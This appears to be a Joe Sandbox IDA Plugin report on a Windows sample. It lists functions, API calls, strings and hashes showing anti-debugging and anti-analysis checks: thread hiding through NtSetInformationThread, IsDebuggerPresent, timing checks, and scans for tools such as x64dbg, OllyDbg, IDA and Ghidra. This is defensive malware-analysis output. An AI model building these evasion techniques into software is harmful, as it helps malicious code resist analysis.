Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: V01@$??6?$basic_ostream@CurrentD@std@@@std@@ProcessU?$char_traits@V01@@exit$DebuggerPresentThread$AddressCheckContextInformationLibraryLoadProcQueryRemotememset
String ID: 0000000000000000$NtQueryInformationProcess$NtSetInformationThread$ntdll.dll
API String ID: 1612837944-2087985706
Opcode ID: 4ed9efc6c4f2838ac493c53bd34a2833aeb7ed01c3fc2b718d819662502dc039
Instruction ID: 8319c61a7b2af0a5a97cebe31ebc93235023aebcb3b2d7665e4d21c516b0b8c4
Opcode Fuzzy Hash: 4ed9efc6c4f2838ac493c53bd34a2833aeb7ed01c3fc2b718d819662502dc039
Instruction Fuzzy Hash: 25E20527D39B835AF703A735A8421A4E764AFA3BC0B81D337FD5836952FF29B1815214

Function 00007FF735DD604D Relevance: 53.0, APIs: 26, Strings: 4, Instructions: 545
threadlibraryprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD6084
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD608F
CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF735DD60A5
Thread32First.KERNEL32 ref: 00007FF735DD60C8
GetCurrentProcessId.KERNEL32 ref: 00007FF735DD60D6
GetCurrentThreadId.KERNEL32 ref: 00007FF735DD60E2
OpenThread.KERNEL32 ref: 00007FF735DD60F9
LoadLibraryA.KERNEL32 ref: 00007FF735DD610E
GetProcAddress.KERNEL32 ref: 00007FF735DD611E
NtSetInformationThread.NTDLL ref: 00007FF735DD6137
CloseHandle.KERNELBASE ref: 00007FF735DD613C
Thread32Next.KERNEL32 ref: 00007FF735DD614A
CloseHandle.KERNELBASE ref: 00007FF735DD6157
GetTickCount.KERNEL32 ref: 00007FF735DD615D
GetTickCount.KERNEL32 ref: 00007FF735DD6196
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD633B
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD6346

Strings

ntdll.dll, xrefs: 00007FF735DD6107
0000000000000000, xrefs: 00007FF735DD63C5
NtSetInformationThread, xrefs: 00007FF735DD6117
!, xrefs: 00007FF735DD606A

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: V01@$Thread$??6?$basic_ostream@CloseCountCurrentD@std@@@std@@HandleThread32TickU?$char_traits@V01@@exit$AddressCreateFirstInformationLibraryLoadNextOpenProcProcessSnapshotToolhelp32
String ID: !$0000000000000000$NtSetInformationThread$ntdll.dll
API String ID: 660862461-448777732
Opcode ID: 069e6fc5e12bfa7b53f41c7acc4fa4b6128ee41731518dc10177068fea139a13
Instruction ID: 2db864938ea583ff6ae5047231fd52787ffda33c05bf1dec3b2343121e40bc81
Opcode Fuzzy Hash: 069e6fc5e12bfa7b53f41c7acc4fa4b6128ee41731518dc10177068fea139a13
Instruction Fuzzy Hash: A2321526D39B835AF703A735A8411A4E354EFA3BC0B80D337FD1836A56FF29B1859254

Function 00007FF735DD4760 Relevance: 30.0, APIs: 13, Strings: 4, Instructions: 249
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 00007FF735DD478C
GetProcAddress.KERNEL32 ref: 00007FF735DD479C
VirtualProtect.KERNELBASE ref: 00007FF735DD47B8
VirtualProtect.KERNELBASE ref: 00007FF735DD47D9

Part of subcall function 00007FF735DD4220: ?_Random_device@std@@YAIXZ.MSVCP140 ref: 00007FF735DD423F

LoadLibraryA.KERNEL32 ref: 00007FF735DD47EB
GetProcAddress.KERNEL32 ref: 00007FF735DD47FB
GetCurrentThread.KERNEL32 ref: 00007FF735DD4809
NtSetInformationThread.NTDLL ref: 00007FF735DD481D
QueryPerformanceFrequency.KERNEL32 ref: 00007FF735DD4824
QueryPerformanceCounter.KERNEL32 ref: 00007FF735DD482F
QueryPerformanceCounter.KERNEL32 ref: 00007FF735DD485A
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD4B91
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD4B9C

Strings

kernel32.dll, xrefs: 00007FF735DD4781
ntdll.dll, xrefs: 00007FF735DD47E4
NtSetInformationThread, xrefs: 00007FF735DD47F4
IsDebuggerPresent, xrefs: 00007FF735DD4795

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: PerformanceQuery$AddressCounterProcProtectThreadV01@Virtual$??6?$basic_ostream@CurrentD@std@@@std@@FrequencyHandleInformationLibraryLoadModuleRandom_device@std@@U?$char_traits@V01@@exit
String ID: IsDebuggerPresent$NtSetInformationThread$kernel32.dll$ntdll.dll
API String ID: 995830000-2640589995
Opcode ID: bcd3b558da3b6b88d0c84ca135e4b9e659e5ef62c955daa7f4b5162cba955bdd
Instruction ID: ef6b1a1f390dc3fa343c131d1ddc2a65abed64d1669c466b977d662175d8fb2c
Opcode Fuzzy Hash: bcd3b558da3b6b88d0c84ca135e4b9e659e5ef62c955daa7f4b5162cba955bdd
Instruction Fuzzy Hash: 36B11726D29B8347F703A735A8421A5E760EFB7B80F91D333F95836A52EF29F1815214

Function 00007FF735DD4300 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 194
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF735DDE9C0: memmove.VCRUNTIME140(?,?,?,?,00007FF735DD18E5), ref: 00007FF735DDE9F8

Part of subcall function 00007FF735DDE9C0: memmove.VCRUNTIME140(?,?,?,?,00007FF735DD18E5), ref: 00007FF735DDEA98

Part of subcall function 00007FF735DDE9C0: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF735DDEAB6

Part of subcall function 00007FF735DDE9C0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FF735DD18E5), ref: 00007FF735DDEA75

FindWindowA.USER32 ref: 00007FF735DD44BF
FindWindowA.USER32 ref: 00007FF735DD45F5

Strings

IDAVW32, xrefs: 00007FF735DD4576
ollydbg.exe, xrefs: 00007FF735DD4350
OLLYDBG, xrefs: 00007FF735DD44FE
windbg.exe, xrefs: 00007FF735DD4437
IDAVW64, xrefs: 00007FF735DD454F
ghidra.exe, xrefs: 00007FF735DD440E
ida64.exe, xrefs: 00007FF735DD43C2
ida.exe, xrefs: 00007FF735DD439C
immunitydebugger.exe, xrefs: 00007FF735DD43E8
WinDbgFrameClass, xrefs: 00007FF735DD4527
x64dbg.exe, xrefs: 00007FF735DD4376

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: FindWindowmemmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID: IDAVW32$IDAVW64$OLLYDBG$WinDbgFrameClass$ghidra.exe$ida.exe$ida64.exe$immunitydebugger.exe$ollydbg.exe$windbg.exe$x64dbg.exe
API String ID: 260637796-2758119655
Opcode ID: 6b267b4c2d587d262b5f3a4b2e46a1f552a5a9a6fd12e3f1921a0a78374d64fc
Instruction ID: aba76dba2e3ab46468d338cddf2ab62545d548d698100c3942ae92e543297101
Opcode Fuzzy Hash: 6b267b4c2d587d262b5f3a4b2e46a1f552a5a9a6fd12e3f1921a0a78374d64fc
Instruction Fuzzy Hash: 3E91B913E64BC695E710EB30D8813F9A3A1FB99748F946335E98C56955EF6CE284D300

Function 00007FF735DE8660 Relevance: 13.7, APIs: 9, Instructions: 217
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF735DD1400: ?_Xlength_error@std@@YAXPEBD@Z.MSVCP140 ref: 00007FF735DD140B
Part of subcall function 00007FF735DD1400: __std_exception_copy.VCRUNTIME140 ref: 00007FF735DD1444

Concurrency::cancel_current_task.LIBCPMT ref: 00007FF735DE8789

Part of subcall function 00007FF735DD1360: __std_exception_copy.VCRUNTIME140 ref: 00007FF735DD13A4

?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF735DD2731), ref: 00007FF735DE87F7
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF735DD2731), ref: 00007FF735DE8864
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF735DD2731), ref: 00007FF735DE888D
?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF735DD2731), ref: 00007FF735DE88BF
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF735DD2731), ref: 00007FF735DE8903
?uncaught_exceptions@std@@YAHXZ.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF735DD2731), ref: 00007FF735DE890A
?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ.MSVCP140(?,?,?,?,?,?,?,?,?,00007FF735DD2731), ref: 00007FF735DE8917

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: D@std@@@std@@U?$char_traits@$?sputc@?$basic_streambuf@$__std_exception_copy$?flush@?$basic_ostream@?setstate@?$basic_ios@?uncaught_exceptions@std@@Concurrency::cancel_current_taskOsfx@?$basic_ostream@V12@Xlength_error@std@@
String ID:
API String ID: 1116575367-0
Opcode ID: bbc7d65fcaf90a6998d791623030b49b5e4d929c6c0049f9ce94b40985ca8bb2
Instruction ID: a84f75918ee52e99b08f9f6c6120fb3bdfb805aac6a988f94962a16e24cfa4b5
Opcode Fuzzy Hash: bbc7d65fcaf90a6998d791623030b49b5e4d929c6c0049f9ce94b40985ca8bb2
Instruction Fuzzy Hash: A781C022A18B8396EB28AF59E5C0239E7A0FB84F91F948635DE5E477A0CF3DD441D350

Function 00007FF735DD4660 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF735DD469D
K32EnumProcessModules.KERNEL32 ref: 00007FF735DD46B6
GetCurrentProcess.KERNEL32 ref: 00007FF735DD46D5
K32GetModuleBaseNameA.KERNEL32 ref: 00007FF735DD46EF
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF735DD470B

Strings

dbghelp.dll, xrefs: 00007FF735DD4685
dbgcore.dll, xrefs: 00007FF735DD4691

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: Process$Current$BaseEnumModuleModulesName_stricmp
String ID: dbgcore.dll$dbghelp.dll
API String ID: 3352702578-4118436743
Opcode ID: 0a376a7893cbf69bfc92418234ae339a0ea07210be39fff49d77d34e94c064e7
Instruction ID: b8ca6f46a9afe43233bdda00b90d2f9f4150311fe12625bb37cc0297b5e80ba1
Opcode Fuzzy Hash: 0a376a7893cbf69bfc92418234ae339a0ea07210be39fff49d77d34e94c064e7
Instruction Fuzzy Hash: 13215B32A28B83A1EB64AB11F4886AAF3A0FF89F84F840135DA9D47758DF3CD545D750

Function 00007FF735DD5C3D Relevance: 10.6, APIs: 7, Instructions: 137
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD5C74
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD5C7F
VirtualAlloc.KERNELBASE ref: 00007FF735DD5C96
memset.VCRUNTIME140 ref: 00007FF735DD5CB2
VirtualFree.KERNELBASE ref: 00007FF735DD5CE1
SetLastError.KERNEL32 ref: 00007FF735DD5CE9
GetLastError.KERNEL32 ref: 00007FF735DD5CF6

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: ErrorLastV01@Virtual$??6?$basic_ostream@AllocD@std@@@std@@FreeU?$char_traits@V01@@exitmemset
String ID:
API String ID: 1195510658-0
Opcode ID: 154ded7906f738e41a20b20b423903e3eefdf99f7c5cb5676869e4120bd489bc
Instruction ID: da8bfa617e06bfbccf85ba506b1022ef60fc129cfd7eaabd752162867b2d0753
Opcode Fuzzy Hash: 154ded7906f738e41a20b20b423903e3eefdf99f7c5cb5676869e4120bd489bc
Instruction Fuzzy Hash: 8D514826D29B8756F707A735D8812B4E390EFA3FC0F80D332E91975A91EF2DB1865210

Function 00007FF735DD583D Relevance: 9.1, APIs: 6, Instructions: 139
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD5874
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD587F
GetCurrentProcess.KERNEL32 ref: 00007FF735DD5886
OpenProcessToken.ADVAPI32 ref: 00007FF735DD5899
GetTokenInformation.KERNELBASE ref: 00007FF735DD58BD
CloseHandle.KERNELBASE ref: 00007FF735DD58F0

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: ProcessTokenV01@$??6?$basic_ostream@CloseCurrentD@std@@@std@@HandleInformationOpenU?$char_traits@V01@@exit
String ID:
API String ID: 3415005937-0
Opcode ID: 516184fb45ba1e57938e678d562d6cb78ddd6161b742196d2db2486299c41f81
Instruction ID: 4feb6e0dcfa90577d1969883304a843011e93b287d512bb175866e36ef9ae1e8
Opcode Fuzzy Hash: 516184fb45ba1e57938e678d562d6cb78ddd6161b742196d2db2486299c41f81
Instruction Fuzzy Hash: D1512927D39B8356E703AB35D8811A4E790EFA3B81FC0D332E95836955EF2DE1855210

Function 00007FF735DD558C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

!, xrefs: 00007FF735DD5647
, xrefs: 00007FF735DD563E

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID:
String ID: $!
API String ID: 0-2056089098
Opcode ID: 73c69bf2605b0504c12c3e7402fb25c37ed305435cad5dacd0e605a5dfae49a0
Instruction ID: eab9778112a27c1ad75539270b85ad34bf5cbe7f34e38910e26093fd5f048c4b
Opcode Fuzzy Hash: 73c69bf2605b0504c12c3e7402fb25c37ed305435cad5dacd0e605a5dfae49a0
Instruction Fuzzy Hash: F461F96BC3AB935AF703A635D8420A4E654AFB7AC4B91D333FD2435952FF19B1C25104

Function 00007FF735DD566D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF735DD56A4
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF735DD56AF

Strings

!, xrefs: 00007FF735DD568A

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: V01@$??6?$basic_ostream@D@std@@@std@@U?$char_traits@V01@@exit
String ID: !
API String ID: 1843798239-2657877971
Opcode ID: f6dc64b6eaa81990a047da6be329a26b6ee895c9142677a65225b002ccd37885
Instruction ID: cd4034f29f628db56af211cf502e2e25429cf837365324ea0434361c8f2e819f
Opcode Fuzzy Hash: f6dc64b6eaa81990a047da6be329a26b6ee895c9142677a65225b002ccd37885
Instruction Fuzzy Hash: 63411927C39B835AE703A735D8821A4E754EFA3B80B91D333ED5435952EF29B1865214

Function 00007FF735DE8540 Relevance: 3.8, APIs: 3, Instructions: 76
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF735DD2230: _Query_perf_frequency.MSVCP140 ref: 00007FF735DD223D
Part of subcall function 00007FF735DD2230: _Query_perf_counter.MSVCP140 ref: 00007FF735DD2246

Sleep.KERNEL32 ref: 00007FF735DE8601
Sleep.KERNEL32 ref: 00007FF735DE8611
Sleep.KERNEL32 ref: 00007FF735DE863C

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: Sleep$Query_perf_counterQuery_perf_frequency
String ID:
API String ID: 1739919806-0
Opcode ID: ab111ca79f4a78db496b9a69bf0d871289a32234e7ec8453937e56b0bf773d7e
Instruction ID: 78ccd98d9c137b093a9f008f25cf922734c8e04c14e56bb9c4431691a23c8cfa
Opcode Fuzzy Hash: ab111ca79f4a78db496b9a69bf0d871289a32234e7ec8453937e56b0bf773d7e
Instruction Fuzzy Hash: 74212721B3A64B52FE1CAB05A4D1279D251AF88FC0FC44138EE5E0B7C6DD2CF4426790

Function 00007FF735DD1140 Relevance: 3.0, APIs: 2, Instructions: 22
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF735DD1164
__stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF735DD1185

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: __acrt_iob_func__stdio_common_vfprintf
String ID:
API String ID: 2168557111-0
Opcode ID: 637e5199e8fed006d71aa5e9ce5577a9ffca0d3cb35ddd55e9b0b21b32c4b3ec
Instruction ID: d7328291a582ed5115af83ecfc521a646e8d54c8c6deffae6deea10b932761cd
Opcode Fuzzy Hash: 637e5199e8fed006d71aa5e9ce5577a9ffca0d3cb35ddd55e9b0b21b32c4b3ec
Instruction Fuzzy Hash: 85E03932A08B8292E700AB50F84445AF7A4FB98BC4F804435EB8C47B28CF7CC1A5CB40

Function 00007FF735DD4220 Relevance: 1.5, APIs: 1, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

?_Random_device@std@@YAIXZ.MSVCP140 ref: 00007FF735DD423F

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2494902862.00007FF735DEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495028369.00007FF735E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495077308.00007FF735E1D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495116195.00007FF735E37000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2495154431.00007FF735E39000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff735da0000_NCTSgL4t0B.jbxd

Similarity

API ID: Random_device@std@@
String ID:
API String ID: 1041445435-0
Opcode ID: 1277d883f72dae62fb0219c161c67b0fae52470f6efe841d722db1aaa51dd26c
Instruction ID: 51bbafe3eb1613e5ef4c2f96554b240981d97fef8461fc73a62e2b3d5a9a5945
Opcode Fuzzy Hash: 1277d883f72dae62fb0219c161c67b0fae52470f6efe841d722db1aaa51dd26c
Instruction Fuzzy Hash: D511AE3273864396FF68AB64F4A637AE295FBC5700F801135E54E82BD5DE3CD2005710

Function 00007FF735DA1000 Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32 ref: 00007FF735DA1006

Memory Dump Source

Source File: 00000000.00000002.2494722365.00007FF735DA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735DA0000, based on PE: true

Associated: 00000000.00000002.2494604577.00007FF735DA0000.00000002.00000001.01000000.00000003.sdmpDownload File
